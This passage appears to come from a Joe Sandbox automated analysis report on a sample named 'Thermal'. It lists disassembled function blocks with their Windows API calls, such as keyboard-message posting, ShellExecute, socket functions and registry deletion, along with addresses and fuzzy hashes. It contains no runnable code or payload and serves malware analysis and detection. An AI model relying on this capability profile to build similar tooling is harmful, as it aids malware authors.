                                                      • Instruction Fuzzy Hash: 28A19C30204201AFCB16EF64C891B6EBBF5BF99314F14891DF59A872A2DB31E955CF42
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000), ref: 00122E9F
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000,000000FF), ref: 00122EE7
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000), ref: 0015C55B
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0015C508,00000004,00000000,00000000,00000000), ref: 0015C5C7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: d06dccf0347c895aa49821e467b5e47912e0cc67893bd98ce20b7c2aafbed1ea
                                                      • Instruction ID: de67088b250cac4fa71332dcac28cfda056c1be89749a65540d6fc3edad9925c
                                                      • Opcode Fuzzy Hash: d06dccf0347c895aa49821e467b5e47912e0cc67893bd98ce20b7c2aafbed1ea
                                                      • Instruction Fuzzy Hash: 97411930704790FED7398F29AC88A7F7B92BB95301F16440DE8574A960DB71A8A4E761
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00187698
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001876CF
                                                      • EnterCriticalSection.KERNEL32(?), ref: 001876EB
                                                      • _memmove.LIBCMT ref: 00187739
                                                      • _memmove.LIBCMT ref: 00187756
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00187765
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0018777A
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00187799
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 376f468af8ea12209756c451bab423d3195a628936898e713001cb35f35635af
                                                      • Instruction ID: 0c7dbd7455648cc804e8886efb047b5a979c3609d9a1a60583019b849a2f67d4
                                                      • Opcode Fuzzy Hash: 376f468af8ea12209756c451bab423d3195a628936898e713001cb35f35635af
                                                      • Instruction Fuzzy Hash: E1319231904105EFDB11EF64DC89E6FB7B8EF49710B2441A5F904AB296D730DE94CBA0
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 001A6810
                                                      • GetDC.USER32(00000000), ref: 001A6818
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A6823
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 001A682F
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001A686B
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001A687C
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001A964F,?,?,000000FF,00000000,?,000000FF,?), ref: 001A68B6
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001A68D6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 01c337be264f01fba31954a81070f4be216df2ec6e9725e9d2b8b9b99d9db0b1
                                                      • Instruction ID: 51b810e57c1f0d362ddb36f34cdd2a488fac57d2e1393d8e148e75adeb82d126
                                                      • Opcode Fuzzy Hash: 01c337be264f01fba31954a81070f4be216df2ec6e9725e9d2b8b9b99d9db0b1
                                                      • Instruction Fuzzy Hash: AE316D76101214BFEB118F10CC8AFAB3BADEB4A761F044155FE089A291D7759891CB70
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 15cd855d1fbd221218b847222fd8ab78a4b8b711e0e63a881f6f0fe38400ac77
                                                      • Instruction ID: dc28c497f7bb9880be3a49b26d72927a4d0ca0711a8a8db3998f294773ac1c97
                                                      • Opcode Fuzzy Hash: 15cd855d1fbd221218b847222fd8ab78a4b8b711e0e63a881f6f0fe38400ac77
                                                      • Instruction Fuzzy Hash: A121A4726012157AD60C7621CE82FEF377CAF25794F058029FE1AA6353EB50DE218AE1
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                      • _wcstok.LIBCMT ref: 0018F2D7
                                                      • _wcscpy.LIBCMT ref: 0018F366
                                                      • _memset.LIBCMT ref: 0018F399
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 3ef9f888a0c39cff88b53b0228723e9c966ebd6b1ffbc0006769d7baf9b8a6d3
                                                      • Instruction ID: a3cf979a2c3388a75226ec08eeec987fdd3d5e7c7de9563f90f8985974d00d9a
                                                      • Opcode Fuzzy Hash: 3ef9f888a0c39cff88b53b0228723e9c966ebd6b1ffbc0006769d7baf9b8a6d3
                                                      • Instruction Fuzzy Hash: 2BC17B71608740AFC724EF64D891A6AB7E4FF94350F00492DF899972A2DB30ED46CF92
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001972EB
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0019730C
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0019731F
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 001973D5
                                                      • inet_ntoa.WSOCK32(?), ref: 00197392
                                                        • Part of subcall function 0017B4EA: _strlen.LIBCMT ref: 0017B4F4
                                                        • Part of subcall function 0017B4EA: _memmove.LIBCMT ref: 0017B516
                                                      • _strlen.LIBCMT ref: 0019742F
                                                      • _memmove.LIBCMT ref: 00197498
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 421d14a894c98848b6c7f9dcf2c357451a92b3c34c31453061096a95daf54724
                                                      • Instruction ID: e19b77fe10127f8a62791856544b020740cf3901e2e39a92e6e1d4a088daef46
                                                      • Opcode Fuzzy Hash: 421d14a894c98848b6c7f9dcf2c357451a92b3c34c31453061096a95daf54724
                                                      • Instruction Fuzzy Hash: 3181D271618310ABDB14EB24DC82E6FB7A8EFA4714F10861CF5569B2D2EB70ED41CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a35b6abf9d36672a80cdd91bdf09924768a15e2691c61674d4f898520167b32a
                                                      • Instruction ID: e27894e23b4a8b435f9637f4dd0a823a81365970fbb89d9d61d51a126cedfe4d
                                                      • Opcode Fuzzy Hash: a35b6abf9d36672a80cdd91bdf09924768a15e2691c61674d4f898520167b32a
                                                      • Instruction Fuzzy Hash: C2717D30900119FFCB09DF58DC88ABEBB79FF99315F158259F915AB251C7309A61CBA0
                                                      APIs
                                                      • IsWindow.USER32(010E4AA0), ref: 001ABA5D
                                                      • IsWindowEnabled.USER32(010E4AA0), ref: 001ABA69
                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 001ABB4D
                                                      • SendMessageW.USER32(010E4AA0,000000B0,?,?), ref: 001ABB84
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 001ABBC1
                                                      • GetWindowLongW.USER32(010E4AA0,000000EC), ref: 001ABBE3
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001ABBFB
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: 7cc363adfe5ab7963a79fe8a1f1d2d142cc0ab07531dd38c3eb3f41e3a0fc813
                                                      • Instruction ID: 2e96a2a62618b077f28fc4fb3c18549ca918e88bc7e825d69712d164a3b52e2b
                                                      • Opcode Fuzzy Hash: 7cc363adfe5ab7963a79fe8a1f1d2d142cc0ab07531dd38c3eb3f41e3a0fc813
                                                      • Instruction Fuzzy Hash: DB71A238608284EFEB25DF54C8D4FBABBB5FF5A310F144059E946972A2C731AD90DB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 0019FB31
                                                      • _memset.LIBCMT ref: 0019FBFA
                                                      • ShellExecuteExW.SHELL32(?), ref: 0019FC3F
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                      • GetProcessId.KERNEL32(00000000), ref: 0019FCB6
                                                      • CloseHandle.KERNEL32(00000000), ref: 0019FCE5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: aa68bf086f257f399293bb24f33c013c88a65e48c9d1e38e5f36c5bbed2fdab1
                                                      • Instruction ID: dc3d08156ae97f9d5c7abfac82c577b1081dbea20299715dc4e814942f20fd8e
                                                      • Opcode Fuzzy Hash: aa68bf086f257f399293bb24f33c013c88a65e48c9d1e38e5f36c5bbed2fdab1
                                                      • Instruction Fuzzy Hash: 51618C75A00629AFCF14EFA4C4919AEBBF5FF58310F148569E816AB351CB30AD42CF90
                                                      APIs
                                                      • GetParent.USER32(?), ref: 0018178B
                                                      • GetKeyboardState.USER32(?), ref: 001817A0
                                                      • SetKeyboardState.USER32(?), ref: 00181801
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0018182F
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0018184E
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00181894
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001818B7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: e3063e1983c575abb8861ca946b7855a5bef433ed94ac9b190854f18d2de628a
                                                      • Instruction ID: 3564a0b73efef7787748a193805d522c1ee57d5ea3e8385b4050b2d81e810a5f
                                                      • Opcode Fuzzy Hash: e3063e1983c575abb8861ca946b7855a5bef433ed94ac9b190854f18d2de628a
                                                      • Instruction Fuzzy Hash: EB51F5A29047D53DFB366224CC06BB67EED5B06304F08498DE0D5468C2D398DED6DF50
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 001815A4
                                                      • GetKeyboardState.USER32(?), ref: 001815B9
                                                      • SetKeyboardState.USER32(?), ref: 0018161A
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00181646
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00181663
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001816A7
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001816C8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 9d35a2d4b78077122e230e93254f4629538bf9b2da3925a65150577feb61141e
                                                      • Instruction ID: e98419a9316456c54c6379a23ab22a6333b4dfcd71244b530a5c99e5dc7afbd8
                                                      • Opcode Fuzzy Hash: 9d35a2d4b78077122e230e93254f4629538bf9b2da3925a65150577feb61141e
                                                      • Instruction Fuzzy Hash: FF51F3A29047D53DFB36A324CC41BBA7EAD5B06300F1C8589E0D9468C2D794EE8AEB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: ec45c92c93d3f99f2d0ab31cca1e987dac73bc8363a2903adf732b233ac22cbf
                                                      • Instruction ID: 8515722ee8d466e52b0a51a5456bf39b4184dd223df6e6e7826187ec62723097
                                                      • Opcode Fuzzy Hash: ec45c92c93d3f99f2d0ab31cca1e987dac73bc8363a2903adf732b233ac22cbf
                                                      • Instruction Fuzzy Hash: 7041ACA6C206187ACB11FBF4884AACFB3B9EF15320F508956F919E3121E734A35587A5
                                                      APIs
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00183B8A,?), ref: 00184BE0
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00183B8A,?), ref: 00184BF9
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00183BAA
                                                      • _wcscmp.LIBCMT ref: 00183BC6
                                                      • MoveFileW.KERNEL32(?,?), ref: 00183BDE
                                                      • _wcscat.LIBCMT ref: 00183C26
                                                      • SHFileOperationW.SHELL32(?), ref: 00183C92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: 8d7e4fd3b581fef58632ba598b285a8e4dbb1351daeb37fae3021ebd001b14a3
                                                      • Instruction ID: b8ec68153fb470d54c4a2586d79258594ac64b4f55e4858e033bd9938460cc16
                                                      • Opcode Fuzzy Hash: 8d7e4fd3b581fef58632ba598b285a8e4dbb1351daeb37fae3021ebd001b14a3
                                                      • Instruction Fuzzy Hash: 96418BB140C344AAC752EF64C481ADBB7E8AF99740F44092EF49AC3161EB34D7888B52
                                                      APIs
                                                      • _memset.LIBCMT ref: 001A78CF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A7976
                                                      • IsMenu.USER32(?), ref: 001A798E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A79D6
                                                      • DrawMenuBar.USER32 ref: 001A79E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 8cb44c7fa427467837b073c767941d0a85effff81b29914f0ef022afe69d2190
                                                      • Instruction ID: f5b62877869d6b268f89def47bde603b8014a45fc41c866c6b928a4ba713dba8
                                                      • Opcode Fuzzy Hash: 8cb44c7fa427467837b073c767941d0a85effff81b29914f0ef022afe69d2190
                                                      • Instruction Fuzzy Hash: 0B414D75A04249EFDB20DF54D884E9AB7F9FB0A324F04412AE95597290C770AE50CF90
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 001A1631
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001A165B
                                                      • FreeLibrary.KERNEL32(00000000), ref: 001A1712
                                                        • Part of subcall function 001A1602: RegCloseKey.ADVAPI32(?), ref: 001A1678
                                                        • Part of subcall function 001A1602: FreeLibrary.KERNEL32(?), ref: 001A16CA
                                                        • Part of subcall function 001A1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001A16ED
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 001A16B5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 0a4c995ce765981966156d04b5e4eab11451f760b300b9d7c43646daf080ecb9
                                                      • Instruction ID: 3bfe5bf56830c1640094cc5034d70671d2384ee426371a85ef9c0f6d04c859bf
                                                      • Opcode Fuzzy Hash: 0a4c995ce765981966156d04b5e4eab11451f760b300b9d7c43646daf080ecb9
                                                      • Instruction Fuzzy Hash: B0313AB5900209BFDB159B90DC89AFFB7BCEF09340F00026AF505E2150EB709E859AA0
                                                      APIs
                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001A6911
                                                      • GetWindowLongW.USER32(010E4AA0,000000F0), ref: 001A6944
                                                      • GetWindowLongW.USER32(010E4AA0,000000F0), ref: 001A6979
                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001A69AB
                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001A69D5
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A69E6
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A6A00
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
